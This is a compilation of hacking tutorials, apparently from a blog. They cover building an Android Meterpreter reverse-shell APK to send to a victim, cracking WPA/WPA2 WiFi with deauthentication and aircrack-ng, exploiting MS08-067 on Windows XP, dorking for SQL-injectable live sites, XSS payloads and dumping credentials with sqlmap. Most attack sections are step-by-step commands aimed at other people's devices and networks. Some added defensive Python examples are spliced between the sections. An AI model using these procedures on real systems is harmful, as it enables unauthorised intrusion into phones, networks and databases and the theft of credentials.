Hack Android Mobile With Metasploit step by step


Hello guys, today in this post we will discuss how to hack an Android mobile. There are many ways of hacking Android, but today I will show you how you can hack an Android mobile using Metasploit, because Metasploit is a free framework, so we can hack a mobile by this method. First let me start with an introduction.

Android

Android is a mobile operating system based on the Linux kernel, developed by Google. Primarily, Android is designed for touch-screen mobiles such as smartphones, tablets, etc., with a user interface based on direct manipulation.

So let's come to the point.

Pre-requisites:

  1. Android Phone
  2. Attacker system: Kali Linux
  3. Metasploit
  4. Brain 🙂

So these are the requirements to perform this practical. In this Metasploit series I am covering from the basics and will cover up to post exploitation.

  • As the attacker we need to check our IP address using the “ifconfig” command, to set LHOST & LPORT.
  • Now you need to create a msfpayload; use the following command.

msfpayload android/meterpreter/reverse_tcp LHOST=[Attacker IP address] LPORT=[Port which you want to forward] R > /var/www/anyname.apk


Here I set LPORT to 443, because there is one good reason behind this: almost every mobile has port 443 open.

By using the above command, the APK will be created.

  • Now launch msfconsole.
  • Here we use the exploit multi/handler to start our attack, together with the payload.
  • Use the commands given below, hitting Enter after each one.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [attacker IP]
set LPORT 443

Now we need to give permission to the APK that we created, attack.apk. For giving permission use this command:

chmod 777 /var/www/attack.apk

Yeah, we gave permission to our APK. Now I will send the file to the victim. Before the victim installs this file, just start your Metasploit listener using the exploit command. When the victim installs your APK, the Metasploit output changes like this and shows you that a session has opened.


Now our listener is listening for traffic and giving information.

In the previous tutorial we discussed post exploitation with Meterpreter in the NetAPI Windows XP vulnerability; read it carefully, the steps are the same.

Keep learning and practising…

Hack WiFi password WPA/WPA2 using Aircrack-ng


Hello guys, today in this post we are going to discuss how to hack a WiFi password. I know everybody likes this tutorial, because everybody wants free WiFi. So let's start, but first let me give you some information about WPA and WPA2.

WiFi Protected Access (WPA) and WiFi Protected Access II (WPA2) are two security protocols developed by the WiFi Alliance to secure wireless networks.

WiFi Protected Access (WPA)

Introduced as a security enhancement over WEP while the 802.11i wireless security standard was being developed. WPA could be implemented by upgrading the firmware of wireless network interface cards.

WiFi Protected Access II (WPA2)

Introduced as a security enhancement over WPA. Based on 802.11i, which was finalised in 2004. The most important security enhancement of WPA2 over WPA is the Advanced Encryption Standard (AES).

Note: WPA and WPA2 should be deployed without the WPS feature, because WPS allows WPA and WPA2 encryption to be bypassed and is effectively broken in many situations.

Now let's get to our work.

Pre-requisites

  1. Kali Linux
  2. Wireless adapter, if you are using a virtual machine.
  3. Brain 🙂

Let's start…

  1. Open up your terminal and type ifconfig.

This will show you all available network interfaces connected to your device.

2. Now type airmon-ng in the terminal and hit Enter; it will show you your interfaces. Here my interface is wlan0, so my command would be airmon-ng start wlan0. Type this command in the terminal and hit Enter.

3. Here the message “monitor mode enabled on mon0” means that my card was successfully put into monitor mode.


4. Now type the command airodump-ng mon0. Here my monitor interface is mon0, that's why I used mon0. You will have to use the interface on which your monitor mode is enabled.

5. The airodump-ng mon0 command will show you a list of the BSSIDs and channels of all nearby WiFi access points.


6. Yeah, we got the BSSID, ESSID and channel. Please note all of that, open a new terminal, enter the following command and hit Enter. For more details see the image shown below.

airodump-ng -c [channel] --bssid [BSSID here] -w [file name you want] mon0


Now the above command will show this kind of result: it monitors only the targeted network and allows us to capture more specific information. Here we are waiting for a device to connect or reconnect to the network.


7. Now it's time to capture the four-way handshake so that we can get the plain password of the network. Here is the tricky part: if there is a client connected to the network, there will be a MAC address listed in the STATION column. If someone is connected to the network, you can de-authenticate him with the following command, so that he/she will try to reconnect to the network.

aireplay-ng -0 3 -a [BSSID of the network] -c [MAC address of the client] mon0


Here you can send any number of packets, but a few packets will be enough. If you don't get the four-way handshake, you can hit Ctrl+C to stop them.

8. When you enter the above command it will send de-authentication packets; the client gets disconnected from the network, tries to reconnect, and we get the four-way handshake in our capture file.

Check whether the handshake is completed or not. See the image below showing the handshake completed.


9. Now it's time to crack the four-way handshake. First see where our handshake .cap file is saved, so please enter the following.


10. Now it's time to brute-force the .cap file using aircrack, but for brute-forcing the .cap file you need a wordlist. There are a few of them in Kali Linux, but you can download one or create one using crunch. Aircrack simply tries each password in the dictionary, and when a password matches it shows you the matched password.

11. Here we are using the darkc0de.lst password file, which is placed in “/root/Desktop/darkc0de.lst”.

12. Final step: enter the command given below.

aircrack-ng -w [location of password list] -b [BSSID of the access point] [cap file location, with asterisk: *.cap]

This is shown in the image below.


Aircrack tries to brute-force, but it depends on the CPU processing speed and the size of the file; it may take a lot of your time.

After executing the above command, this type of screen appears.


If the key is found, a KEY FOUND message appears. But if you can't get the password, you can try all kinds of password-combination wordlists, which will take a lot of your time.
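Why the dictionary step is CPU-bound, as an added example that is not part of the original post: WPA/WPA2 turns the passphrase into the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), and aircrack-ng has to repeat exactly this for every wordlist entry before it can test one candidate against the captured handshake. The test vector in the test is the one from IEEE 802.11i Annex H; the throughput figure is a constructed benchmark of this pure-Python code, not of aircrack-ng.

```python
"""
Added example (not from the original post): derive the WPA/WPA2 PMK the way a
client does, PBKDF2-HMAC-SHA1 with 4096 iterations and the SSID as salt. This is
the work aircrack-ng repeats for every wordlist entry before it can test one
candidate against the captured handshake.
"""
import hashlib
import hmac
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def pbkdf2_sha1_by_hand(passphrase: str, ssid: str) -> bytes:
    """The same derivation spelled out with hmac so the cost is visible:
    32 bytes need two 20-byte SHA-1 blocks, so 2 x 4096 HMAC calls per guess."""
    key = passphrase.encode()
    out = b""
    for block in (1, 2):
        # U1 = HMAC(key, salt || INT(block)); U_j = HMAC(key, U_{j-1}); F = XOR of all U_j
        u = hmac.new(key, ssid.encode() + block.to_bytes(4, "big"), hashlib.sha1).digest()
        t = bytearray(u)
        for _ in range(4095):
            u = hmac.new(key, u, hashlib.sha1).digest()
            t = bytearray(a ^ b for a, b in zip(t, u))
        out += bytes(t)
    return out[:32]


def guesses_per_second(samples: int = 50) -> float:
    """Constructed benchmark: how many PMKs per second this single core derives,
    i.e. the ceiling on wordlist entries a cracker like this could test per second."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate-{i}", "IEEE")
    return samples / (time.perf_counter() - start)
```

Because the SSID is the salt, a table precomputed for one network name is useless against another, and a passphrase that is not in the wordlist is never found; that, rather than the capture step, is what a long random passphrase defends against.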

Exploit windows xp by metasploit Netapi vulnerability


Hello guys, I hope you are doing well and practising. Today in this tutorial I will show how you can exploit Windows XP using Metasploit.

In this tutorial we will exploit Windows XP via the MS08-067 NetAPI vulnerability. So, which type of vulnerability is this? The answer: it is a vulnerability in the Windows SMB (Server) service called MS08-067; this exploit works on port 445 and up to Windows XP SP3.

Name: Microsoft Server Service Relative Path Stack Corruption
Exploit: exploit/windows/smb/ms08_067_netapi
  • As I told you above, this vulnerability works on port 445, so firstly scan for open ports.
  • Open Nmap and scan for open ports with this command: nmap -n -sV 192.168.1.*


  • Yeah, port 445 is open.
  • Start msfconsole and use the above exploit as shown below.
  • Now set RHOST. RHOST is the remote address of the victim.


  • Now set the payload as shown below. Here the payload is set to get a reverse connection in Meterpreter; we are using the Windows Meterpreter. If you want to see all available payloads for this exploit, use the “show payloads” command. Here we are using this payload:
windows/meterpreter/reverse_tcp
  • Now use the show options command and set LHOST. LHOST is your IP address.
  • Run exploit. Yeah, we get a connection back from the victim PC.

Post Exploitation with meterpreter

  • Type sysinfo to get the system information of the victim.


Here you can see in the above image that the victim's information is available. There are many options in Meterpreter; you can list them with the ‘?’ command. Suppose you want a shell on that PC: run the ‘shell’ command in Meterpreter and a shell will be created.

Soon I will add many more tutorials to our Metasploit series, because Metasploit has many exploits, auxiliary modules, payloads, scripts, etc. which will help you with exploitation.

keep learning and practising because practise makes a man perfect… 🙂


How to find sql vulnerable website easily


Hello guys, in this post I will show you how you can find a lot of SQL-vulnerable websites with a single dork using an automated tool, but I recommend that you find them manually. Many newbies don't find vulnerable sites to inject easily, so with this tutorial they will be able to find SQL-vulnerable websites easily.

So in this tutorial we will use SQL DB; if you don't have SQL DB, you can find it via Google.

  • Launch SQL DB, and on the left you will see the search option.


  • Just enter your dork. The best feature of this tool is that it lets you choose which search engine you want to use; the other features are Deep scan and Proxy.
  • When you start the search using your dork, it will start scanning.
  • Once the scan has started, you can see multiple tabs such as Proxy, Vulnerable, etc.
  • Just click on Vulnerable and it shows you the list of SQL-vulnerable websites.

Cross site scripting (XSS) Vulnerability


Hello guys, welcome to Infosec Zone. Today I'm going to show you the cross-site scripting vulnerability, which is one of the most dangerous vulnerabilities and is listed in the OWASP Top 10. Read carefully, try and practice. In this tutorial we will cover reflected cross-site scripting via the GET method and the POST method.

What is cross site scripting ( XSS )

XSS is a type of attack in which an attacker injects a malicious script into a website. XSS occurs when a web application sends user-supplied input, in the form of browser-side script, to other end users.

The malicious script can access cookies, session tokens or other sensitive information, etc. It is caused by insufficient input validation on the server side as well as the client side.

There are two basic types of XSS:

  • Reflected cross-site scripting (non-persistent) XSS attack
  • Stored cross-site scripting (persistent) XSS attack

Read more about them on the official OWASP website.

So let's start the practical…

Here I am using bWAPP on my localhost; you can use this or DVWA. But I think bWAPP is quite a bit better than DVWA.

So in this practical we use this payload:

<img src=lol.png onerror=prompt(document.domain) />

First select the XSS vulnerability to attack and start.



Just paste this payload in the first name and last name fields and click Go. As a result you can see that our code is executed and we got a popup.

Great, we have successfully XSSed… 🙂

The above XSS was via the GET method. Let's start the POST method. For the POST method the requirement is the HackBar add-on in Firefox; install it if you don't have it and follow me step by step.

Just click on Post data in HackBar, type anything in both fields and load the URL; you will see something like this.


In the post data, add the payload. See the image below and execute.


Yeah, our code is executed… Keep learning 🙂 and share it.
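The reflected form above, as an added example that is not from the original post or from bWAPP: a minimal Python render of the first-name/last-name greeting, with the vulnerable concatenation beside the fix (HTML output encoding with html.escape), driven by the page's own payload delivered the same way whether it arrives as a GET query string or a POST body. The field names and the greeting markup are assumptions.

```python
"""
Added example (not from the original post or bWAPP): reflected XSS in a
first-name/last-name greeting. The vulnerable render pastes input into HTML;
the fixed one applies output encoding. Field names and markup are assumptions.
"""
import html
import re
from urllib.parse import parse_qs, urlencode

# The payload used on the page: the browser treats the reflected text as a tag,
# the image fails to load and the onerror handler runs.
PAYLOAD = "<img src=lol.png onerror=prompt(document.domain) />"

# Constructed form submission; a GET query string and a POST body share this format.
BODY = urlencode({"firstname": PAYLOAD, "lastname": "test", "form": "submit"})


def render_vulnerable(firstname: str, lastname: str) -> str:
    # Raw concatenation: whatever the user typed becomes part of the page's markup.
    return f"<p>Welcome {firstname} {lastname}</p>"


def render_fixed(firstname: str, lastname: str) -> str:
    # Output encoding: <, >, &, and quotes become entities, so the browser
    # renders the input as visible text and never parses it as a tag.
    return f"<p>Welcome {html.escape(firstname)} {html.escape(lastname)}</p>"


def handle_form(body: str, safe: bool) -> str:
    """Parse the submitted fields (GET or POST) and render the greeting."""
    fields = parse_qs(body)
    first = fields.get("firstname", [""])[0]
    last = fields.get("lastname", [""])[0]
    return render_fixed(first, last) if safe else render_vulnerable(first, last)


# A tag carrying an on*= attribute in the response means script can run.
EVENT_ATTR = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def contains_event_handler(rendered: str) -> bool:
    """Response check a tester or a test suite can run on the rendered HTML."""
    return EVENT_ATTR.search(rendered) is not None
```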


SQL injection through SQLMAP step by step


Hello guys, today I'm going to show you a major vulnerability in web applications. There are many types of injection, and SQL injection is one of them. SQL injection is a very vast topic; keep learning, as I am also still a learner. So without wasting any time, let's come to the point.

SQL Injection

SQL injection is a type of vulnerability in which an attacker can execute some code and expose the backend database; or, in simple words, an attacker can dump your database.

SQLMap

SQLMap is a command-line tool used for exploiting SQL injection vulnerabilities. It is an open-source tool.

If you are using Windows you can download SQLMap here; however, Kali has SQLMap built in.

Let's start the practical…

  • Launch SQLMAP

Now type the following command in the terminal:

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 --current-db


  • Now our SQLMap has started. It will take a couple of seconds to enumerate the database.
  • Now we have the database, as you can see in the above image. Our next step is to enumerate tables.
  • Type the following command to enumerate tables; follow me step by step. 🙂

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D [database name] --tables


As you can see in the image below, we have successfully enumerated the table names.


In the above image you can see that sqlmap enumerated the table names. Now we have to find the columns; here I am finding the columns of admin.

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D [database name] -T [table name] --columns

Again sqlmap is enumerating the column names from the table admin.


Cool guys, we have successfully enumerated the column names. Now our next step is to dump/enumerate the username and password.

Follow me and use this command:

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D [database name] -T [table name] -C [column name] --dump


sqlmap started enumerating the database, and as you can see the data has been dumped.


Yeah, we got the username and password… 🙂 Keep learning and practising, but don't harm any site…
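The `?id=1` parameter that sqlmap works on above, as an added example that is not part of the original post or of sqlmap: an in-memory SQLite lookup written the vulnerable way (request value spliced into the SQL string) beside the parameterised fix, so the tables sqlmap would enumerate stay unreachable. The articles table and its rows are constructed sample data.

```python
"""
Added example (not from the original post or from sqlmap): a `?id=1` lookup
against an in-memory SQLite table, the vulnerable way and the parameterised way.
The articles table and its rows are constructed sample data.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "Public post", "visible to everyone"),
         (2, "Draft", "not yet published"),
         (3, "Internal memo", "staff only")],
    )
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    # The request parameter is spliced into the SQL text, so its content is parsed
    # as SQL: "1 OR 1=1" turns a one-row lookup into a dump of the whole table.
    # This is the weakness sqlmap automates with -D/-T/-C/--dump.
    sql = f"SELECT id, title FROM articles WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def fetch_safe(conn: sqlite3.Connection, id_param: str) -> list:
    # Validate the type, then bind the value. The driver sends it as data, never
    # as statement text, so no input can change the shape of the query.
    try:
        article_id = int(id_param)
    except ValueError:
        return []  # reject non-numeric ids rather than guessing what was meant
    return conn.execute("SELECT id, title FROM articles WHERE id = ?", (article_id,)).fetchall()
```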